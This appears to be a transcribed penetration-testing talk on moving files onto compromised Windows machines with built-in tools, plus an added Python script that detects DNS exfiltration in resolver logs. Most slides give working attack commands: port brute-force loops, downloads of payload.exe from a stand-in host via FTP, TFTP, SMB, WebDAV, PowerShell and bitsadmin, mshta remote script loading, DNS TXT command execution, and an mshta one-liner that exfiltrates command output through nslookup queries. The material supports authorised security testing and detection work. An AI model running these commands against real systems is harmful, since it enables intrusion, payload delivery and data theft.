1. Windows File Uploading Out of the Box [post exploitation]
   Vyacheslav Yegoshin, Positive Technologies, PHDAYS III
2. [whoami]
   http://github.com/nxnrt/WindowsUploadToolkit
   Vyacheslav Yegoshin
   - Penetration tester
   - SCADAStrangeLove team member
3. [Problem]
4. [OSes] .NET 3.5 Integrated/UAC/etc.
5. [Utilities and tools]
   ― FTP
   ― TFTP
   ― Telnet
   ― JScript/VBScript
   ― Windows Script File
   ― MSHTA
   ― Samba
   ― WebDAV
   ― PowerShell
   ― BITSADMIN
   ― NSLOOKUP
   ― …
6. [Egress Firewall Test]
   - Check all TCP ports
   - Check all UDP ports
7. [Egress Firewall][Windows XP & 2003]
   - Bruteforce all TCP ports on Pentest with telnet
   FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
8. [Egress Firewall][Windows XP & 2003]
   - Bruteforce all TCP ports on Pentest with telnet
   - Bruteforce all UDP ports on Pentest with nslookup
   FOR /L %i IN (1,1,4096) DO (cmd /c "start /b telnet 1.2.3.4 %i")
   FOR /L %i IN (1,1,4096) DO (cmd /c "start /b nslookup -port=%i ya.ru 1.2.3.4")
9. [Egress Firewall][Incoming connection]
   - Capture your traffic with TCPdump!
   tcpdump -n 5.5.5.5
10. [Egress Firewall][Windows XP & 2003]
   Influence:
   ~ 400 telnet.exe processes
   ~ 700 MB RAM is used
   ~ 30 min TCP scan
   ~ 30 min UDP scan
11. [Egress TCP][Windows Vista and Later]
   - Bruteforce all TCP ports on Pentest with PowerShell
   - Telnet client is disabled by design :( but if we can run it with elevated permissions …
   dism /online /enable-feature /featurename:TelnetClient
12. [Egress TCP][Windows Vista and Later]
   - Bruteforce all TCP ports on Pentest with PowerShell
   powershell -encodedCommand [Base64-encoded script omitted; the decoded script is on the next slide]
13. [Egress TCP][Windows Vista and Later] (Base64 decode)
   function sT($IP, $Port) {
       $Address = [System.Net.IPAddress]::Parse($IP)
       $End = New-Object System.Net.IPEndPoint $Address, $Port
       $Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
       $Stype = [System.Net.Sockets.SocketType]::Stream
       $Ptype = [System.Net.Sockets.ProtocolType]::TCP
       $Sock = New-Object System.Net.Sockets.Socket $Saddrf, $Stype, $Ptype
       $Sock.TTL = 26
       try {
           $Sock.Connect($End)
           [Byte[]] $Message = [char[]]"w00tw00t"
           $Sent = $Sock.Send($Message)
       } catch {}
       $Sock.Close()
   }
   1..65535 | %{ sT -IP "1.2.3.4" -Port $_ }
14. [Egress UDP][Windows Vista and Later]
   - Bruteforce all UDP ports on Pentest with PowerShell
   - nslookup "set port" option doesn't work! :(
   powershell -encodedCommand [Base64-encoded script omitted; the decoded script is on the next slide]
15. [Egress UDP][Windows Vista and Later] (Base64 decode)
   function sU($IP, [int]$Port) {
       $Address = [System.Net.IPAddress]::Parse($IP)
       $End = New-Object System.Net.IPEndPoint($Address, $Port)
       $Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
       $Stype = [System.Net.Sockets.SocketType]::Dgram
       $Ptype = [System.Net.Sockets.ProtocolType]::UDP
       $Sock = New-Object System.Net.Sockets.Socket $Saddrf, $Stype, $Ptype
       $Sock.TTL = 26
       $Sock.Connect($End)
       $Enc = [System.Text.Encoding]::ASCII
       $Message = "w00tw00t"
       $Buffer = $Enc.GetBytes($Message)
       $Sent = $Sock.Send($Buffer)
       $Sock.Close()
   }
   1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
16. [Egress TCP&UDP][Windows Vista and Later]
   Minor Influence:
   - 1 powershell.exe process
   ~ 100 MB RAM is used
   ~ 40 min TCP scan
   ~ 40 min UDP scan
17. [Telnet] (Any TCP open)
   Target:  mode CON COLS=2000 && telnet -f c:\payload.vbs 1.2.3.4 53
            (COLS=2000 sets the max line length; -f gives the path to save)
   Pentest: nc -q 20 -lvp 53 < payload.vbs
18. [Telnet] Only ASCII symbols: HEX is our choice!
19. [FTP] (Any TCP open)
   - Script file must exist
   - FTP client built in all Windows versions
20. [FTP] (Any TCP open)
   Create script file payload.txt:
     open 1.2.3.4 3128
     quote pasv
     binary
     get payload.exe c:\payload.exe
     bye
   Target:  ftp -i -s:payload.txt
   Pentest: service pure-ftpd start
21. [TFTP] (69/UDP open)
   - Use only UDP protocol
   - TFTP client is disabled by design :( but if we can run it with elevated permissions …
   dism /online /enable-feature /featurename:TFTP
22. [TFTP] (69/UDP open)
   Target:  tftp -i 1.2.3.4 GET payload.exe
   Pentest: atftpd --daemon --port 69 /tmp
23. [Samba] (445/TCP open)
   + No writable directory
   + No command output
   - Proxy isn't supported
   - 445/tcp only
24. [Samba] (445/TCP open)
   Target:  net use X: \\1.2.3.4
            start x:\payload.exe
   Pentest: service smbd start
25. [JScript/VBScript] (Any TCP open)
   ― Encode EXE to script
   ― Use protocols: SMTP, FTP, LDAP …
   ― Script file must exist: .js, .jse, .vbs, .vse
   ― JScript vs VBScript
   ― cscript vs wscript
26. [JScript/VBScript] (Any TCP open)
   Target:  telnet -f payload.js 1.2.3.4 53
            cscript payload.js
   Pentest: nc -q 20 -lvp 53 < payload.js
27. [JScript/VBScript]
   telnet -f payload.js 1.2.3.4 53 & cscript payload.js
   Why not? Press any key
28. [JScript/VBScript] (Any TCP open)
   Target:  cscript \\1.2.3.4\payload.js
   Pentest: service smbd start
29. [Windows Script File]
   ― XML document
   ― Script file must exist: .wsf, .wse
   ― JScript and VBScript
   ― External scripts
   ― Encode EXE to WSF
30. [Windows Script File][Link external script] (Any TCP open)
   cscript payload.wsf
   <job><script language="VBScript" src="http://1.2.3.4:80/payload.vbs"></script></job>
   <job><script language="VBScript" src="ftp://1.2.3.4:21/payload.vbs"></script></job>
   <job><script language="VBScript" src="\\1.2.3.4\payload.vbs"></script></job>
31. [Windows Script File] ― Any2Bat (zzzEVAzzz)
   p.exe -> Make p.cab -> Read p.cab and Base64 encode -> insert into the <cab> element:
   <package>
   <cab xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64"><!-- insert here --></cab>
   <job><script language="VBScript">…</script></job>
   </package>
   Convert to BAT: echo … >> payload.wsf
32. [Windows Script File] ― Any2Bat. Now in PowerShell!
   • Make-CabFile -Path
   • Convert-Cab2Base64 -CabPath
   • Convert-Cab2WSF -CabEncode
   • Convert-Cab2Bat -CabEncode
   Make-CabFile -Path c:\payload.exe | Convert-Cab2WSF
   Make-CabFile -Path c:\payload.exe | Convert-Cab2Bat
33. [Windows Script File] DEMO
34. [MSHTA]
   ― No browser security zones
   ― Argument: URL or Script
     • JScript
     • VBScript
   ― No UAC
   ― Parse text on the fly
35. [MSHTA] (Any TCP open)
   mshta http(s)://pastebin.com:80/raw.php?i=5W6JtsUu
   mshta ftp://1.2.3.4:21/payload.jpg
   mshta \\1.2.3.4\payload.js
36. [MSHTA] (Any TCP open)
   mshta vbscript:Execute("WScript.Echo 1")
   mshta javascript:Execute("WScript.Echo(1);")
37. [NSLOOKUP] (no tcp/udp open)
   ― Get DNS Records:
     • IP -> Domain name (PTR)
     • Domain name -> IP (A and AAAA)
     • Get TXT record (TXT)
38. [NSLOOKUP] (no tcp/udp open)
   [Diagram] TARGET (IP: 192.168.1.10) -> Internal primary DNS -> Firewall/NAT (internal IP: 192.168.1.1, external IP: 5.5.5.5) -> PENTEST (IP: 1.2.3.4, name server: pentest.com)
   Remote Command Execution: get all TXT records from rce.pentest.com; the response travels back along the same DNS path.
39. [NSLOOKUP][Get file]
   Name server rce.pentest.com serves TXT = 1x" & echo dir "c:\Program Files" >> p.bat & "
   TARGET (IP: 192.168.1.10): nslookup -type=TXT rce.pentest.com > run.bat & run.bat
40. [NSLOOKUP][Get file]
   TARGET (IP: 192.168.1.10): source of p.bat is a valid command
41. [NSLOOKUP][Send]
   Name server: rce.pentest.com; TARGET IP: 192.168.1.10
   PoC: FOR /F %I IN ('ipconfig /all') DO nslookup %I.rce.pentest.com
   DNS server logging
42. [NSLOOKUP][Send]
   mshta "javascript:
     function h(out){ var hxd=''; for(a=0;a<out.length;a=a+1){ hxd=hxd+out.charCodeAt(a).toString(16); } return hxd; }
     function r(cmd){ var shell=new ActiveXObject('WScript.Shell'); var se=shell.Exec(cmd); var out=''; while(!(se.StdOut.AtEndOfStream)){ out=out+se.StdOut.ReadLine(); } return out; }
     function ex(cmd){ var out=h(r(cmd)); query=out.match(/.{1,60}/g); for(v=0;v<query.length;v=v+1){ r('nslookup '+v+'x'+query[v]+'.pentest.com') }; }
     function e(){ ex('dir'); }
     window.onload=e"
43. [NSLOOKUP][Send]
   Read command STDOUT. Example command: dir
   Convert to HEX, split with .match(/.{1,60}/g); for each (j, val) query j + "x" + val + ".pentest.com"
   nslookup 0x417070446174614170706c69636174696f6e5c2044617461436f6e746163.pentest.com
   nslookup 1x7473436f6f6b6965734465736b746f70446f63756d656e7473446f776e6c.pentest.com
   nslookup 2x6f61647344726f70626f784661766f72697465734c696e6b734c6f63616c.pentest.com
44. [NSLOOKUP][Send] (no tcp/udp open)
   Pentest: use auxiliary/server/fakedns
   where powershell
45. [NSLOOKUP][Send file] DEMO
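A defender-side counterpart to slides 42-44, added here and not part of the talk or the WindowsUploadToolkit: it scans resolver query logs for the `<n>x<hex>.domain` labels the PoC emits, groups them per client and domain, and reassembles the hex chunks in sequence order so an analyst can read what left the host. The log line format and the client IP are constructed for this example; the three query names are those printed on slide 43.

```python
import re
from collections import defaultdict

# Label shape from slide 43: <sequence>x<1..60 hex chars>.<domain>
CHUNK_RE = re.compile(r"^(\d+)x([0-9a-fA-F]{1,60})\.(.+)$")
# Constructed resolver log format for this example: "client <ip> query: <qname> IN <type>"
LOG_RE = re.compile(r"^client (?P<client>\S+) query: (?P<qname>\S+) IN ")

# Constructed sample log; the three chunk query names are the ones printed on slide 43.
SAMPLE_LOG = """\
client 192.168.1.10 query: 0x417070446174614170706c69636174696f6e5c2044617461436f6e746163.pentest.com IN A
client 192.168.1.10 query: www.example.com IN A
client 192.168.1.10 query: 1x7473436f6f6b6965734465736b746f70446f63756d656e7473446f776e6c.pentest.com IN A
client 192.168.1.10 query: 2x6f61647344726f70626f784661766f72697465734c696e6b734c6f63616c.pentest.com IN A
"""

def parse_query(line):
    """Return (client, seq, hex_chunk, domain) for a chunk-shaped query, else None."""
    m = LOG_RE.match(line)
    cm = m and CHUNK_RE.match(m.group("qname"))
    if not cm:
        return None
    return m.group("client"), int(cm.group(1)), cm.group(2).lower(), cm.group(3).lower()

def find_exfil(log_text, min_chunks=2):
    """Group chunk queries per (client, domain); keep only streams with >= min_chunks."""
    streams = defaultdict(dict)
    for line in log_text.splitlines():
        parsed = parse_query(line)
        if parsed:
            client, seq, chunk, domain = parsed
            streams[(client, domain)][seq] = chunk
    return {key: chunks for key, chunks in streams.items() if len(chunks) >= min_chunks}

def reassemble(chunks):
    """Join chunks in sequence order and hex-decode; also report missing sequence numbers."""
    seqs = sorted(chunks)
    missing = [s for s in range(seqs[0], seqs[-1] + 1) if s not in chunks]
    hexdata = "".join(chunks[s] for s in seqs)
    # Slide 42's encoder does not zero-pad bytes below 0x10, so an odd-length stream is ambiguous.
    text = bytes.fromhex(hexdata).decode("latin-1") if len(hexdata) % 2 == 0 else None
    return text, missing

if __name__ == "__main__":
    for (client, domain), chunks in find_exfil(SAMPLE_LOG).items():
        text, missing = reassemble(chunks)
        print(f"{client} -> {domain}: {len(chunks)} chunks, missing {missing}: {text!r}")
```

Run against a real resolver log, only the `LOG_RE` line shape needs adapting; the label regex and reassembly are independent of the log format.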
46. [WebDAV] vs. [Samba]
   WebDAV (Any TCP open):  + No writable directory  + No command output  + Proxy  + Any tcp open  + SSL
   Samba (445/TCP open):   + No writable directory  + No command output  - Proxy isn't supported  - 445/tcp only
47. [WebDAV][Windows XP SP3 or KB892211] (Any TCP open)
   Target:  net use X: http(s)://1.2.3.4/webdav
            net use X: \\1.2.3.4\webdav
            net use X: \\1.2.3.4@SSL\webdav
            net use X: \\1.2.3.4@SSL@5443\webdav
            net use X: \\1.2.3.4@53\webdav
   Pentest: Apache WebDAV module
48. [PowerShell] (Any TCP open)
   ― C# code
   ― Any application level protocol
   ― Encoded commands
   ― Simple and it works!
49. [PowerShell] (Any TCP open)
   Target:  (New-Object System.Net.WebClient).DownloadFile("http://1.2.3.4:80/payload.exe","c:\payload.exe")
   Pentest: service apache2 start
50. [BITSADMIN][Windows 2003 SP1 and later] (Any TCP open)
   Target:  bitsadmin /transfer whatever http://1.2.3.4:80/payload.exe c:\payload.exe
   Pentest: service apache2 start
51. [BITSADMIN][Windows 2003 SP1 and later] (Any TCP open)
   bitsadmin /CREATE /DOWNLOAD jobname
   bitsadmin /ADDFILE jobname http://1.2.3.4/payload1.exe p1.exe
   bitsadmin /ADDFILE jobname http://1.2.3.4/payload2.exe p2.exe
   …
   bitsadmin /RESUME jobname
   bitsadmin /COMPLETE jobname
52. [Special tnx]
   — Gleb Gritsai
   — Sergey Gordeychik
53. Questions?
   http://github.com/nxnrt/WindowsUploadToolkit
   @vegoshin
   vegoshin@ptsecurity.com